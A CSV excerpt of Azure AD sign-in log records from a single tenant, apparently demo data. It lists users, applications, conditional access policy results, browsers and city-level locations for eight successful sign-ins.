+976,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",1fc6d415-116e-44c9-a4fc-b8ef7dba1300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1fc6d415-116e-44c9-a4fc-b8ef7dba1300,SigninLogs,Sucess,33.0175209,35.44601059
+977,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,161ee6d6-0670-4323-98cc-291717e1c049,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e073edf9-f5bb-4bea-bfc3-4266ba7d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e073edf9-f5bb-4bea-bfc3-4266ba7d1400,SigninLogs,Sucess,33.7984581,-84.38828278
+978,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:39.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ffd99713-55ff-4753-86a4-8a21c0ec8b6e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eaba61a1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3b0e5c51-5aba-4adb-89c0-6eaba61a1500,SigninLogs,Sucess,41.90428925,-85.99833679
+979,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:14.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2a441153-2f56-41f5-86a8-9fdaed59ba5d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41cc5746-ae7e-445a-962a-17f630371700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,41cc5746-ae7e-445a-962a-17f630371700,SigninLogs,Sucess,33.7984581,-84.38828278
+980,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:29.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,21947cad-62a8-4d17-bc75-3efb6cf88da6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c58f2de3-9305-4921-96ef-ebf03e391400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c58f2de3-9305-4921-96ef-ebf03e391400,SigninLogs,Sucess,33.7984581,-84.38828278
+981,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:04.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4965e974-5e29-41f1-a8d7-3e43d0622f4d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",99476ccd-67d1-454b-a7cf-079eec111500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,99476ccd-67d1-454b-a7cf-079eec111500,SigninLogs,Sucess,41.90428925,-85.99833679
+982,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:48.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a45ae61e-b3cc-49a3-8281-f830d87ae137,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c95450b3-582d-4306-9dd2-9bda8c321500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c95450b3-582d-4306-9dd2-9bda8c321500,SigninLogs,Sucess,33.7984581,-84.38828278
+983,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:46.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9ea6d5cf-12cf-4b88-9a2e-d97f7df50550,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",69bf3c7f-96b8-4aae-959c-a7bbd5981400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,69bf3c7f-96b8-4aae-959c-a7bbd5981400,SigninLogs,Sucess,41.90428925,-85.99833679
